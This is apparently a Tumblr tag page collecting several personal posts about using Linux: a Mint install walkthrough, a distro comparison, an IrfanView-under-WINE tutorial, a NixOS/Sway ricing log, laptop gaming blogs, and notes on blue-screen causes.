#for reasons of using the same window managers linux does
Explore tagged Tumblr posts
Text
Installing Linux (Mint) as a Non-Techy Person
I've wanted Linux for various reasons since college. I tried it once when I no longer had to worry about having specific programs for school, but it did not go well. It was a dedicated PC that was, I believe, poorly made. Anyway.
In the process of deGoogling and deWindows365'ing, I started to think about Linux again. Here is my experience.
Pre-Work: Take Stock
List out the programs you use regularly and those you need. Look up whether or not they work on Linux. For those that don't, look up alternatives.
If the alternative works on Windows/Mac, try it out first.
Make sure you have your files backed up somewhere.
Also, pick up a 5GB minimum USB drive.
Oh and make a system restore point (look it up in your Start menu) and back-up your files.
Step One: Choose a Distro
Dear god do Linux people like to talk about distros. Basically, from what all I've read, if you don't want to fuss a lot with your OS, you've got two options: Ubuntu and Linux Mint. Ubuntu is better known and run by a company called Canonical. Linux Mint is run by a small team and paid for via donations.
I chose Linux Mint. Some of the stuff I read about Ubuntu reminded me too much of my reasons for wanting to leave Windows, basically. Did I second-guess this a half-dozen times? Yes, yes I did.
The rest of this is true for Linux Mint Cinnamon only.
Step Two: Make your Flash Drive
Linux Mint has great instructions. For the most part they work.
Start here:
The trickiest part of creating the flash drive is verifying and authenticating it.
On the same page that you download the Linux .iso file there are two links. Right click+save as both of those files to your computer. I saved them and the .iso file all to my Downloads folder.
Then, once you get to the 'Verify your ISO image' page in their guide and you're on Windows like me, skip down to this link about verifying on Windows.
Once it is verified, you can go back to the Linux Mint guide. They'll direct you to download Etchr and use that to create your flash drive.
If this step is too tricky, then please reconsider Linux. Subsequent steps are both easier and trickier.
Step Three: Restart from your Flash Drive
This is the step where I nearly gave up. The guide is still great, except it doesn't mention certain security features that make installing Linux Mint impossible without extra steps.
(1) Look up your Bitlocker recovery key and have it handy.
I don't know if you'll need it like I did (I did not turn off Bitlocker at first), but better to be safe.
(2) Turn off Bitlocker.
(3) Restart. When on the title screen, press your Bios key. There might be more than one. On a Lenovo, pressing F1 several times gets you to the relevant menu. This is not the menu you'll need to install, though. Turn off "Secure Boot."
(4) Restart. This time press F12 (on a Lenovo). The HDD option, iirc, is your USB. Look it up on your phone to be sure.
Now you can return to the Linux Mint instructions.
Figuring this out via trial-and-error was not fun.
Step Four: Install Mint
Just follow the prompts. I chose to do the dual boot.
You will have to click through some scary messages about irrevocable changes. This is your last chance to change your mind.
I chose the dual boot because I may not have anticipated everything I'll need from Windows. My goal is to work primarily in Linux. Then, in a few months, if it is working, I'll look up the steps for making my machine Linux only.
Some Notes on Linux Mint
Some of the minor things I looked up ahead of time and other miscellany:
(1) HP Printers supposedly play nice with Linux. I have not tested this yet.
(2) Linux Mint can easily access your Windows files. I've read that this does not go both ways. I've not tested it yet.
(3) You can move the taskbar (panel in LM) to the left side of your screen.
(4) You are going to have to download your key programs again.
(5) The LM software manager has most programs, but not all. Some you'll have to download from websites. Follow instructions. If a file leads to a scary wall of strange text, close it and just do the Terminal instructions instead.
(6) The software manager also has fonts. I was able to get Fanwood (my favorite serif) and JetBrains (my favorite mono) easily.
In the end, be prepared for something to go wrong. Just trust that you are not the first person to ever experience the issue and look it up. If that doesn't help, you can always ask. The forums and reddit community both look active.
178 notes
·
View notes
Text
Linux distros - what is the difference, which one should I choose?
Caution, VERY long post.
With more and more simmers looking into linux lately, I've been seeing the same questions over and over again: Which distro should I choose? Is distro xyz newbie-friendly? Does this program work on that distro?
So I thought I'd explain the concept of "distros" and clear some of that up.
What are the key differences between distros?
Linux distros are NOT different operating systems (they're all still linux!) and the differences between them aren't actually as big as you think.
Update philosophy: Some distros, like Ubuntu, (supposedly) focus more on stability than being up-to-date. These distros will release one big update once every year or every other year and they are thoroughly tested. However, because the updates are so huge, they inevitably tend to break stuff anyway. On the other end of the spectrum are so-called "rolling release" distros like Arch. They don't do big annual updates, but instead release smaller updates very frequently. They are what's called "bleeding edge" - if there is something new out there, they will be the first ones to get it. This can of course impact stability, but on the other hand, stuff gets improved and fixed very fast. Third, there are also "middle of the road" distros like Fedora, which kind of do... both. Fedora gets big version updates like Ubuntu, but they happen more frequently and are comparably smaller, thus being both stable and reasonably up-to-date.
Package manager: Different distros come with different package managers (APT on ubuntu, DNF on Fedora, etc.). Package managers keep track of all the installed programs on your PC and allow you to update/install/remove programs. You'll often work with the package manager in the terminal: For example, if you want to install lutris on Fedora, you'd type in "sudo dnf install lutris" ("sudo" stands for "super user do", it's the equivalent of administrator rights on Windows). Different package managers come with different pros and cons.
Core utilities and programs: 99% of distros use the same stuff in the background (you don’t even directly interact with it, e.g. background process managing). The 1% that do NOT use the same stuff are obscure distros like VoidLinux, Artix, Alpine, Gentoo, Devuan. If you are not a Linux expert, AVOID THOSE AT ALL COST.
Installation process: Some distros are easier to install than others. Arch is infamous for being a bit difficult to install, but at the same time, its documentation is unparalleled. If you have patience and good reading comprehension, installing arch would literally teach you all you ever need to know about Linux. If you want to go an easier and safer route for now, anything with an installer like Mint or Fedora would suit you better.
Community: Pick a distro with an active community and lots of good documentation! You’ll need help. If you are looking at derivatives (e.g. ZorinOS, which is based on Ubuntu which is based on Debian), ask yourself: Does this derivative give you enough benefits to potentially give up community support of the larger distro it is based on? Usually, the answer is no.
Okay, but what EDITION of this distro should I choose?
"Editions" or “spins” usually refer to variations of the same distro with different desktop environments. The three most common ones you should know are GNOME, KDE Plasma and Cinnamon.
GNOME's UI is more similar to MacOS, but not exactly the same.
KDE Plasma looks and feels a lot like Windows' UI, but with more customization options.
Cinnamon is also pretty windows-y, but more restricted in terms of customization and generally deemed to be "stuck in 2010".
Mint vs. Pop!_OS vs. Fedora
Currently, the most popular distros within the Sims community seem to be Mint and Fedora (and Pop!_OS to some extent). They are praised for being "beginner friendly". So what's the difference between them?
Both Mint and Pop!_OS are based on Ubuntu, whereas Fedora is a "standalone" upstream distro, meaning it is not based on another distro.
Personally, I recommend Fedora over Mint and Pop!_OS for several reasons. To name only a few:
I mentioned above that Ubuntu's update philosophy tends to break things once a big update rolls around every two years. Since both Mint and Pop!_OS are based on Ubuntu, they are also affected by this.
Ubuntu, Mint and Pop!_OS like to modify their stuff regularly for theming/branding purposes, but this ALSO tends to break things. It is apparently so bad that there is an initiative to stop this.
Pop!_OS uses the GNOME desktop environment, which I would not recommend if you are switching from Windows. Mint offers Cinnamon, which is visually and technically outdated (they use the x11 windowing system standard from 1984), but still beloved by a lot of people. Fedora offers the more modern KDE Plasma.
Personal observation: Most simmers I've encountered who had severe issues with setting up Linux went with an Ubuntu-based distro. There's just something about it that's fucked up, man.
And this doesn't even get into the whole Snaps vs. Flatpak controvery, but I will skip this for brevity.
Does SimPE (or any other program) work on this distro?
If it works on Fedora, then it works on Mint/Ubuntu/Arch/etc., and vice versa. This is all just a question of having the necessary dependencies installed and installing the program itself properly. Some distros may have certain prerequisites pre-installed, while others don't, but you can always just install those yourself. Like I said, different distros are NOT different operating systems. It's all still Linux and you can ultimately customize it however you want.
In short: Yeah, all Sims 2-related programs work. Yes, ReShade too. It ultimately doesn't really matter what distro you use as long as it is not part of the obscure 1% I mentioned above.
A little piece of advice
Whatever distro you end up choosing: get used to googling stuff and practice reading comprehension! There are numerous forums, discord servers and subreddits where you can ask people for help. Generally speaking, the linux community is very open to helping newbies. HOWEVER, they are not as tolerant to nagging and laziness as the Sims community tends to be. Show initiative, use google search & common sense, try things out before screaming for help and be detailed and respectful when explaining your problems. They appreciate that. Also, use the arch wiki even if you do not use Arch Linux – most of it is applicable to other distros as well.
#simming on linux#bnb.txt#if anyone wants to use this as a base for a video feel free#i don't feel like like recording and editing lol
120 notes
·
View notes
Text
okay whenever i talk about linux i say shit like "development is easier" or throw around things like LXC or POSIX/UNIX, or whatever insane terms but:
here's my list of actual shit that the average person would care about
Most updates including core system components usually don't even need a reboot(please reboot your computer at least once a week). If it does, it waits for me to reboot. It wont ever stop me in the middle of something to ask me to or force it on me.
If i plug in a device it will just work. I do not need to install drivers or some stinky special crap software for it to be detected, it will most often just work (every new linux kernel version adds so much support for new and old hardware. If it doesn't work now, it might work later!)
Package management. I've sung it's praises so much already but. every other device i know you can click a button and it will update all the apps on your device. except windows. App has an update? Open the software centre or Discover or whatever, click a button boom it's updated. All controlled from one place, no worries about does the app update itself, or whether you're downloading the right installer for your system, just use the package manager that comes with the system and it's good.
It's as minimal as i want it to be. Both windows and mac suffer a lot from just having a bunch of crap that you cannot get rid of. I installed a distro which didnt even come with a graphical interface, it was that minimal. If the distro you use is a bit more reasonable, but it comes with some software you dont want, you can just get rid of it. Shit if you wanted to you can just uninstall the linux kernel and it will just let you, and your computer will be unbootable. You have full control over what you want on your system. Also uninstalling things is less stupid, there's much less cases of leftover files or shit laying around in the registry. (there is no registry)
Audio. "linux audio is bad" is a thing of the past and i'm so serious. Pipewire is an amazing thing. I have full control over which applications give output to which speakers, being able to route one app to multiple speakers at the same time, or even doing things like mapping an input device to speakers so i can monitor it back very easily. I still dont understand why windows does the stupid "default communication device" thing, and they often reset my settings like randomly changing it to 24 bit audio when i only use 16 and certain programs break with it set to 24 idfk. Maybe this is less of an "average user" thing and more of a poweruser thing but i feel like there's SOMETHING in here which may be handy to the average person at some point. i love qpwgraph.
i could think of more but i dont use a computer like a normal person so it will take me time to think of it
14 notes
·
View notes
Text
things that i think actually matter for beginner friendliness:
ROBUST FALLBACKS- i think opensuse's default installation is with btrfs root + grub + snapper + snapper hooks so that if an update ever goes bad you have an archive that you can boot from, immediately, straight from the boot screen, no terminal stuff. thats excellent and more distros should offer this oob. vanillaos's abroot system is also really cool with similar benefits
DISCOVERABLE UI- cinnamon (linux mint) is ok with this but i remember trying to figure out desktop and panel (taskbar) configuration was absolutely opaque to me and there weren't easy answers to how you were supposed to do things. i think kde is really excellent in terms of immediately discoverable ui from a windows expat perspective even though i dont really like the mouthfeel of it for personal use
PAINLESS UPDATES- EITHER use a rolling release system or make your default installation use separate root and home partitions, so that when a million dependencies are changed in your point release and you either have to reinstall or upgrade in place and find out everything broke and THEN reinstall, you dont have to frantically go through your entire computer to find where you might have important user files, save them to a usb, and reorganize them on a new install. this one is frustrating because it would be so easy for this to already be a standard for point release distros but it isnt. ??????
the package management thing is like. the whole reason any distros are different. i have my own opinions but it takes all types probably. but if flatpak's repos were better maintained, or if it were more common practice/more friendly and integrated to use distrobox for gui user programs, i think it would make everyones lives easier and level the playing field for people who actually do reasonably need stable* system components but up to date user apps. i think people are being whiny babies when they say its JUST IMPOSSIBLE to remember "apt-get (program name)" instead of pressing a button that says "get program name" but they got guis all over for the people that want them its an overstated problem
THINGS THAT DONT MATTER FOR USER FRIENDLINESS: why does everyone fucking act like ubuntu/mint's point releases and dead and rotting "stable" repos are an absolute benefit to newbies who dont know what they want or how to express what they want yet. breaking and changing dependencies are a bad situation to thrust upon unsuspecting noobs for sure but im pretty sure there is the exact same amount of that regardless of distro because it just does not happen often enough to be dampened by slower releases. like, the appimage integrator they packaged in mint going dead because of aging dependencies. like what did they want me to do about that as the end user who still wanted to integrate appimages?? as far as i could tell the answer is Nothing
*stupid word that causes like 90% of all problems when talking about linux
3 notes
·
View notes
Text
How to install and use IrfanView in Linux - Tutorial
How to install and use IrfanView in Linux - Tutorial
Updated: May 30, 2022
My Windows to Linux migration saga continues. We're still a long way off from finishing it, but it has begun, and I've also outlined a basic list of different programs I will need to try and test in Linux, to make sure when the final switch cometh that I have the required functionality. You can find a fresh bouquet of detailed tutorials on how to get SketchUp, Kerkythea, KompoZer, as well as Notepad++ running in Linux, all of them using WINE and successfully too, in my Linux category.
Today, my focus will be on IrfanView, a small, elegant image viewer for Windows, which I've been using with delight for decades now. It's got everything one needs, and often more than the competitors, hence this bold foray of using it in Linux despite the fact there are tons of native programs available. But let's proceed slowly and not get too far ahead of ourselves. After me.
As I said, it's majestic. A tiny program that does everything. It's fast and extremely efficient. When I posted my software checklist article, a lot of Linux folks said, well, you should try XnView instead. And I did, honest, several times, including just recently, which we will talk about in a separate article, but the endeavor reminded me of why I'd chosen IrfanView all those years back. And those reasons remain.
Then, I did play with pretty much every Linux image viewer out there. None is as good as IrfanView. It comes down to small but important things. For instance, in IrfanView, S will save a file, O will trigger the open dialog. Esc quits the program. Very fast. Most other programs use Ctrl + or Shift + modifiers, and that simply means more actions. I did once try to make GwenView use the full range of Irfan's shortcuts, but then I hit a problem of an ambiguous shortcut, wut. I really don't like the fact that hitting Esc takes you to a thumbnail overview mode. But that's what most programs do.
WINE configuration
The first step is to have WINE installed on your system. I am going to use the exact same method outlined in the SketchUp Make 2017 tutorial. I have the WINE repositories added, and I installed the 6.X branch on my system (at the time of writing).
IrfanView installation
Download the desired 32/64-bit version of the program and then install it. The process should be fast and straightforward. You will be asked to make file type association. You can do this, or simply skip the step, because it doesn't make any difference. You need to associate IrfanView as the default image viewer, if this is your choice, through your distros' file type management utility, whatever it may be.
And the program now works! In Plasma, on top of that, you can also easily pin the icon to the task manager.
Plugins and existing configuration(s)
Much like with Notepad++, you can import your existing workspace from a Windows machine. You can copy plugins into the plugins folder, and the IrfanView INI files into the AppData/Roaming folder. If you don't have any plugins, but you'd like to use some, then you will need to download the IrfanView plugins bundle, extract it, and then selectively, manually copy the plugins into the WINE installation folder. For instance, for the 64-bit version of the program, this is the path:
~/.wine/drive_c/Program Files/IrfanView/Plugins
As a crude example, you may want to make IrfanView be able to open WebP files. In that case, you will need to copy the WebP.dll file into the folder above, and relaunch the program. Or you can copy the entire set of IrfanView plugins. Your choice, of course.
Conclusion
And thus, IrfanView is now part of our growing awesome collection of dependable tools that will make the Windows to Linux migration easier. I am quite sure the Linux purists will be angry by this article, as well as the other tutorials. But the real solution is to develop programs with equivalent if not superior functionality, and then, there will be no reason for any WINE hacks.
If you're an IrfanView user, and you're pondering a move to Linux, then you should be happy with this guide. It shows how to get the program running, and even import old settings and plugins. I've been using IrfanView in Linux for many years, and there have been no problems. That doesn't say anything about the future, of course, but then, if you look at what Windows was 10 years ago, and what it is now, it doesn't really matter. Well, that's the end of our mini-project for today. See you around. More tutorials on the way!
Cheers.
3 notes
·
View notes
Text
NixOS Rice Journey
I've always considered myself something of a minimalist when it comes to function over form and beauty within simplicity, but there comes a time in every Linux user's life when they must rice.
Now, firstly, I want to acknowledge that @kfithen's recent ricing journey is like, 50% of the reason I went through with this (\shrug/ he had a good idea, what can I say?!). To be fair, the other 50% is the control and understanding that a good rice gives a person over their computer and environment. I want to know how everything works, and I want to be the person who makes it all come together really well.
I'm not really the type for flashy things or eye-catching rices / eye-candy (I've been using only I3wm for almost the entirety of my Linux history), so I want my rice to take a more subtle, simple approach. I use NixOS because I want my system to stay with me forever and only do what it needs to. I want to spend years optimizing everything I use until my OS reaches its minimal state. In the same way, I want my rice to display the elegant simplicity of nothing extra. I want some basic utilities and visuals that look nice, but aren't distracting.
Most of all, I want my rice to embody my own spirit, or at least what I strive to be. I want to put work into making something that does everything it needs to without encroaching on others. Ideally, I will be able to look at this every day for the rest of my life and it will help me feel secure in myself.
All that said, here's what I've done so far:
Migrated from X11 to Wayland
Switched to greetd and tuigreet for my displaymanager
Switched from I3wm to Sway
Setup Waybar to tell me what I need to know
Setup a custom desktop wallpaper (as opposed to the default Xfce wallpaper or Sway grey)
Setup vifm to view and manage my filesystem
Setup ivm, foot, mpv, etc. to replace xfce-given programs
Upgraded from NixOS 23.11 to 24.05
[Image ID: A (16:9) screenshot of my desktop. There are no windows open. The wallpaper prominently features a modified Nix logo in the center, taking up a little over a third of the vertical space. The logo has been modified so that each of the six "arms" corresponds to a stripe in the trans-nonbinary-flag; the top-right corresponds to the blue stripe at the top of the flag and the arms continue down the flag in a clockwise motion (i.e. blue, pink, yellow, white, purple, black). The background of the wallpaper is a dark grey that is light enough for the black arm to be visible. At the bottom of the screenshot is a Waybar status bar. On the left it shows (left to right) the sway workspaces, workspace name, and scratchpad; on the right it shows (left to right) the system volume (with wireplumber), the keyboard layout, the free space on the root partition, the memory and sway information of the system, the local ip address and wifi-connection strength of the system, the core usage of the system, and the current time and date of the system. The bar is styled with the default styles (for now). \End ID]
[Image ID: Another desktop screenshot. This one shows three windows open with the Sway window manager/compositor. One window, containing my home-manager configuration open in neovim (using the slate colorscheme), is the result of a horizontal split and lies on the left half of the screen. The right half of the screen is vertically split into two windows. The top displays an unstyled vifm, and the bottom displays the output of neofetch. The inner gaps of the windows are set to 10 in sway and there are no other gap configurations. \End ID]
So far, I've been focusing mostly on getting my system working again (leaving xfce completely left a big mark on my system, previously I was using Thunar and a billion other things I took for granted). I'm going through another terminal-based-stuff craze so I'm trying to do more and more stuff through cli and tui applications (flameshot -> shotman, xfce-img-viewer -> imv, xfce-video-player -> mpv, thunar -> vifm).
The only thing I've done cosmetically so far is the background. I wanted to get something that wouldn't clutter my screen if I ever implement transparency, so I didn't want to do anything too complicated. (I'll admit, my first thoughts were Homestuck, Lackadaisy, trains, etc., but those were way to complicated (save for some of the Homestuck stuff, that was good, I just didn't super vibe with anything)). I'm really happy with how it turned out though (the Nix logo is great for customization)! I think the trans-nonbinary-flag colors look great here and fit the vibe sickly. Also, it's Pride Month, so how could I not have something queer on my screen all the time?!?!?! (Well, besides Linux, and NixOS especially, that's queer already, lol).
This post is getting a bit long, so I'll quit my yappin' and end it off with a little summary of what I hope to do next:
Get some sort of transparency (what's the use in having that beautiful wallpaper if you can't see it, plus the background has a low enough complexity that transparency will actually work well)
Set some standards for theming/colors and put them in place (right now my Waybar and vifm especially just don't look right) (this one is going to require a lot of work, but there are also a lot of people who do this amazingly; plus, I've got some colors to work with already :), I really like the the "slate" vim theme and those trans-nonbinary colors are a great start as well, particularly that purple!)
MOAR TERMINAL (maybe try again with steam-tui, risk discord-tui, and re-examine links/lynx) (plus this really helps with fileviewer in vifm)
Try out nix-flakes (I really need to figure out what these things are, they sound right up my alley!)
Setup backups of my system / get all my configs into nix (the few that aren't already there) (I have some suspicion that nix-flakes might help with this)
Learn more (there's always more to learn!)
Welp, that's about it for now! See ya :3
3 notes
·
View notes
Text
Common BSoD reasons (Blue Screen of DESU)
Your computer worked fine yesterday, and now it keeps crashing. Wa da heq?
The most common issues I've seen causing BSoD isn't malware, or even user error. Though they're not the least common causes either.
They're from updates pushed by developers.
Usually it's from some system update that manages your memory allocation incorrectly. Or processor execution errors and mishaps handled incorrectly.
But it is also quite common for a driver update to cause the same issue. And because Video Card drivers update monthly; they're the most likely cause of breakage.
To be fair; not updating your driver's can be just as hard as updating your driver's so it's important to know which driver configuration worked last.
And this is why Windows has system restore points.
Interestingly; one of the most common driver failures I've seen comes from Nvidia Graphics Driver failing to regulate the cards internal temperature appropriately.
There's usually an internal thermal switch that cuts off when the driver gets too hot which then throttles your graphics card and will cause crashing.
And this thermal switch can degrade over time. Which means your graphics card has a lower tolerance for heat than it should.
However; elevation and humidity can *also* cause the same issue. Which means your rig might operate differently in Detroit Mi than it does in Dallas TX, or even SLC UT.
And quite often devs try to reduce their tolerances for kicking in the graphics cards cooling fans; power saving conferences maybe.
And often the will wind up with your card running hotter than it should. This is why the EVGA tools (and other similar software tools) include manual fan controls.
Because the onboard regulation and default drivers tend to heck it all up.
But that's not the only issue I've seen with graphics cards; sometimes: the devs try to use more VRam than the card has. Or even less VRam and then just forget which blocks of VRam they set to be used by the system.
It can literally be fixed one day, and then unfixed and then next, and just toggle back and forth despite user complaints.
In fact; nearly any issue that is commonly considered "due to heating issues" can be traced back to driver issues for similar reasons to what I listed.
Incorrect memory usage, cooling regulation not appropriately modulated cooling modules, processor and graphics processor being sent incorrect commands.
Registry issues can also cause memory issues as certain blocks of memory get used by too many sources at the same time (but not often) multiple drivers trying to run the same hardware (which can also be caused by software creating extra instances of graphics level singleton interfaces)
So if you're ever wondering what could possibly be wrong with your PC, it's more likely a driver issue.
But... You could also have forgotten to install cooling modules, or decided to overclock your hardware without increasing cooling.
Or even overclocked your hardware too much.
But barring overclock; is most likely driver issues. I've even seen windows surface devices on their end of life updates get driver updates that break graphics, causing overheat and ghosting (leftover images) on the screen.
Which I feel like may have been on purpose.
Though locating an older driver, or installing Linux usually worked if no *real* hardware issue was present.
2 notes
·
View notes
Text
How Does Dedicated Server Hosting Work?
A client is provided a physical server that is exclusively dedicated to him with dedicated server hosting. While in shared or virtual hosting, the resources are shared between different users, a dedicated server provides all the resources that comprise the CPU, the RAM, the storage space, the bandwidth that are solely assigned for usage. Here’s an overview of how it works:
How Does Dedicated Server Hosting Work?
1. Provisioning and Setup
Choosing Specifications: Hardware requirements including CPUs cores, RAM size, storage type (SSD/HDD), network bandwidth are chosen by the client according to requirements.
Operating System Installation: The preferred OS being Linux, Windows Server and others are preinstalled in the hosting provider’s server.
Alt Text: Image showing how a dedicated server allows full control over resources
Server Management Software: Some of the additional packages: Control panel (cPanel, Plesk), Database server (MySQL, MSSQL) can be also preset.
Initial Configuration: The hosting provider sets up the network access on the server, updates the necessary security issues, and secures the appropriate firewall.
2. Access and Control
Full Root/Administrator Access: Clients fully manage the Chicago dedicated server or any location. So they can implement applications, regulate exigent services, and modify settings.
Remote Management: Remote access is usually affirmed with SSH for Linux servers and a Remote Desktop Protocol for Windows-based servers.
Control Panels (Optional): cPanel is an example of how server management on various flavors can be done through a web-based graphical interface.
3. Performance and Resources
No Resource Sharing: Everything is calculated for one client – CPU, memory, and disk usage are thus concentrated on the client.
Scalability: Unlike cloud hosting, Chile dedicated servers or any place are a little more constricted. But they can be upgraded with increased hardware or load balancers.
4. Security and Monitoring
Isolated Environment: The risks resulting from other users are also absent on the Chicago dedicated server or any geographical location. The reason is the other clients are not served on the same server.
Alt text: Image representation to show how to secure a dedicated server
DDoS Protection and Firewalls: Web hosts who offer such services provide various security features to counteract cyber threats.
Monitoring Tools: Through the dashboard or some other tool, a Chile or any location’s dedicated server on which the bot runs (load, CPU usage, memory, overall network activity) can be checked.
5. Backup and Maintenance
Automated Backups: This should be noted that the hosting provider or client can set common backups to avoid this kind of dilemma.
Managed vs. Unmanaged Hosting:
Managed: The server management monitors updates, security patches, monitoring, and backup with the server provider’s assistance.
Unmanaged: The client is fully responsible for maintenance tasks.
Alt Text: Pictorial representation of the managed and unmanaged server hosting difference
6. Network and Bandwidth
High-Speed Connections: Data centers that are solely rented mostly offer large bandwidth for traffic without incurring a lag.
Dedicated IP Address: It is common that each server obtains its IP, which can be useful for a website, mail server or application hosting.
7. Cost and Use Cases
Higher Cost: As it gives an environment to use only by one client, dedicated hosting is more costly than shared or VPS hosting.
Use Cases: It is appropriate for loads that require a lot of resources. It also benefits game servers, active websites, SAAS solutions, and enterprise-level databases.
To sum up, with the help of dedicated server hosting, a client gains the maximal control, security, and performance provided by the possibility of using the entire server. The device is suitable for companies and/or organizations, that require high reliability, have a large workload or need a high level of data protection.
0 notes
Text
Boring Blog Episode 1
Hello ladies and gentlemen and welcome to the Boring Blog. I have spent many years playing with Linux but having got tired of fighting with graphics card settings and games I have this new Dell Inspiron 3525.
For the first two weeks of it’s life it ran EndeavourOS Gallileo (Arch based Linux) however after getting tired of fighting with Proton and getting certain games not working. I actually have restored the Dell back to its Windows 11 Home setup.
I admit I really didn’t want to go back to Windows but I tired of not being able to use the full potential of the Vega 8 graphics card. While it is never going to set the world on fire. I was having issues to get it to just play games it is more than capable of playing.
Do you honestly care which game broke the camels back. I got a little bored and wanted to play Blur (Activision driving game). I tried with 5 different versions of Proton, messed with Lutris and after having to re-download the game each time was frustrating as hell.
So I eventually decided it was time to dump Linux and go back to familiar Windows world.
Now I know there is going to be many people informing me of the inherent evil corporation that Microsoft is and all its constant spying upon you. Yes I know but one thing Windows does have is most of the software/hardware in the world is supported and works out of the box first time normally.
To be honest I no longer give a toss who has my information. i am a very boring nearly 50 years old man. I am not exactly challenging Rockefeller for his billions and nothing I do is remotely exciting.
I am probably the one man who if he was identity frauded would probably end up getting it back as it would be chronically sad how little you could with it
Please don’t do that…
So far I have managed to install and play everything I have thrown at Windows 11.
Only minor annoyance is for some reason the right click menu has been shortened and you have to pick the extra options just to get things like copy and paste. Sure I could use the keyboard shortcuts but surely the fact I was given a mouse means I don’t have to do this.
I guess this is the same as those who look at Linux and its reliance upon the terminal. We have designed a system which is more graphical and millions are spent on things like UX and UI and people still resorting to a text based prompt makes it all feel kind of redundant.
Then again this is from a guy who has a Ryzen 7 laptop and is using it to play spectrum games most of the time, so I guess I am nothing if not ironic. I doubt I am really stressing the processor by doing such.
Some people sit and play the latest Call of Duty at 4K with every graphical enhancement they can get to see the slightest flicker of a muzzle flash in the dark. I am playing Diablo from 1997 and hoping it will still play on a modern machine without fifteen patches.
I jest but I really did install OpenRCT2 0.47 which is the latest version in order to play Rollercoaster Tycoon 2 so I could design rollercoasters rather than play the actual parks.
Trust me I have tried modern games I last about eight and a half seconds before someone destroys me. It’s not fun. You know when you sit and play Untitled Goose Game because you think its fun then something is seriously wrong with your life.
I admit I was never a great games player… However I do laugh when the guy who annihilated you at WRX Rally driving gets annoyed because you can get to Level 2 of Double Dragon without losing a life and they can’t.
I may not be able to 100% Cyberpunk 2077 as I doubt my machine would even get beyond 30 FPS but I can consistently get beyond Eugene’s Lair on Manic Miner.
People sit and brag about all the games they have completed. I have completed a small handful of games. Bruce Lee on the Spectrum, Both versions of Knight Tyme 48 and 128 versions. I have completed Diablo and Diablo II on PC beyond that I also completed Untitled Goose Game.
I am never going to be classed a world class gamer.
To be honest once you have completed a game what is the point of going back?
You pay money for these games then decide oh well lets put it on the shelf never to be used again. Maybe I’m missing something, like a brain.
I don’t buy a game to complete it. I buy it to enjoy the experience and have fun. Maybe I am wrong but if you’re only goal is to say yep I’ve beaten it. I think there is something fundamentally wrong.
Or is it just me that actually enjoys the game and if it challenges you and you have to try several times and eventually admit hey I just can’t get this. I’m the one who is fundamentally flawed. No because I can always aspire to come back and try harder.
However if you are at a position where no game is challenging unless you require it to be brutally punishing then surely there is a problem.
I tire of this “Git Gud” culture. I don’t want to play a fighting game where each move requires sixteen sequenced button presses to impress people.
That’s not a game it’s a memory test. Sorry I play games to escape and enjoy myself not to be an endurance test of my stamina and ability to be a human being.
I admit I have been playing TLL on the Spectrum for over twenty years and I have never managed to beat the fourth round of targets. I have got four but the last one eludes me I just don’t have the control.
I have watched RZX playback of someone else doing it and even tried replicating it. I just don’t have the skill. However I still play the game.
Now people are trying to beat games in as quick a time as possible. Completing games using shortcuts and exploits meaning they complete the game in under 5 minutes.
Using techniques to take tenths of seconds of the run. Seriously if I ever take that up then be the first to come and beat me senseless.
What a waste of life. Not only have I beat the game I do so quickly it ain’t worth watching. I honestly just don’t understand the mentality. Sure it shows they have skills to do such but now you have just completed another game and it goes on the shelf to be ignored faster than it was yesterday.
Mind you watching modern games that is the game. Wait for game to load, play for four minutes, get shot, wait thirty seconds for it reload, rinse, repeat.
This is why I don’t own a modern console. I really do not want one I really don’t need one and if I had to choose one I would probably go for a Switch.
It may be the slowest of the bunch but at least the games seem to last longer than three minutes a go.
Also its not 4K and you can see the balls of your horse retract in the cold. I just don’t need that level of detail.
Right I am going to crawl back under my rock and play games that I can’t complete because I am incompetent but I don’t care as I can keep playing not getting any better and I still have a game to play
Until next time … take care people.
0 notes
Text
Linux Life Episode 83
Well, here we are again ladies and gentlemen back at the blog stuff regarding my ongoing Linux experience.
Well since we last spoke I am afraid I had to retire my Dell Inspiron M6800 (Mangelwurzel) as the sound card finally decided to give up. So that meant the touchpad, the sound card and the top pair of memory sockets had stopped working so it had to go.
I have recovered the two 480GB SSDs that it had so I can reuse them in another project should the time come for it. However when one machine exits stage right to the farm. Luck would have it I managed to get a new laptop.
The machine admittedly is another Dell laptop but this one is new. The machine in question is a Dell Inspiron 3525. It's a 15.6” laptop with a Ryzen 7 5200U with 16GB RAM, an Integrated Radeon Vega 8 graphics card, and a 1TB NVME drive.
Sure enough for the first 2 hours of its new existence, it did have a copy of Windows 11 Home (stop spitting at the back there). However, after a bit of learning how to get around the BIOS, I managed to install Endeavour OS Galileo (the latest version).
As I had an AMD graphics card (even if it’s integrated) I decided to run KDE Plasma (in the past I have ran MATE but I thought I would change it up).
Now for the first few days, I was running just the basic setup but when I installed Steam only a few games would start. Terraria, Stardew Valley, and Starbound worked fine as they, I believe use Open GL. However, when I tried to run a game using Proton there was no dice as Vulkan was not listed.
I had to install the version of MESA with Vulkan from the extras and then I could get Untitled Goose Game to run including picking up my XBOX 360-style gamepad. However Path of Exile and Pacman Championship Edition 2 both threw errors running Linux native versions.
However, I then turned on Proton usage, and using the Windows versions both games worked without error. Strange but I am not going to argue they work and I am not going to question beyond that.
For some reason they work if it’s through DXVK but not through the actual Linux Vulkan driver go figure that. Considering I can now play them both fine I am not going to fight it.
Parkitect 1.9a works fine through Wine as it’s a GOG game version I am using.
I admit while I am not a huge game player it’s nice to see them in action.
I have also installed and tested various emulators the list includes Fuse (ZX Spectrum), VICE (c64), Caprice32 (Amstrad CPC), Atari800 (Atari 8 bit), and DOSBox-X (MSDOS). I will probably test a few more in time but all successful so far.
I even did my usual build of GDASH and it works fine. So I can play various incarnations of Boulder Dash should I ever feel so.
Set up OBS Studio, KDEnlive, VLC, Audacity, and more so it can be used to create videos or podcasts should the decision take me.
Also, Cairo-Dock is my choice of on-screen dock as it has been for many years. It’s pretty reliable and I can set it up pretty quickly now.
I have also installed some productivity apps in the form of LibreOffice, RedNotebook, Obsidian, and Focuswriter. I also installed InMyDiary via Wine as the Windows version is the most up-to-date one (I like Lotus Organiser and it looks/works the same).
So it has been running for over a week and I admit I am impressed with its capabilities.
However, it does seem the world of Linux is looking to dump X11 in favour of the Wayland compositor. Now on Mangelwurzel, I could not use Wayland as Nouveau could not run it.
But this new Dell (currently named Parsnip but could be subject to change) has a better graphics card and I have installed the version of KDE Plasma Wayland also.
So I can log out of X11 and switch to Wayland if necessary. It works and I admit speed-wise, it's slightly faster at program opening than X11, but Cairo Dock doesn’t support Wayland just yet.
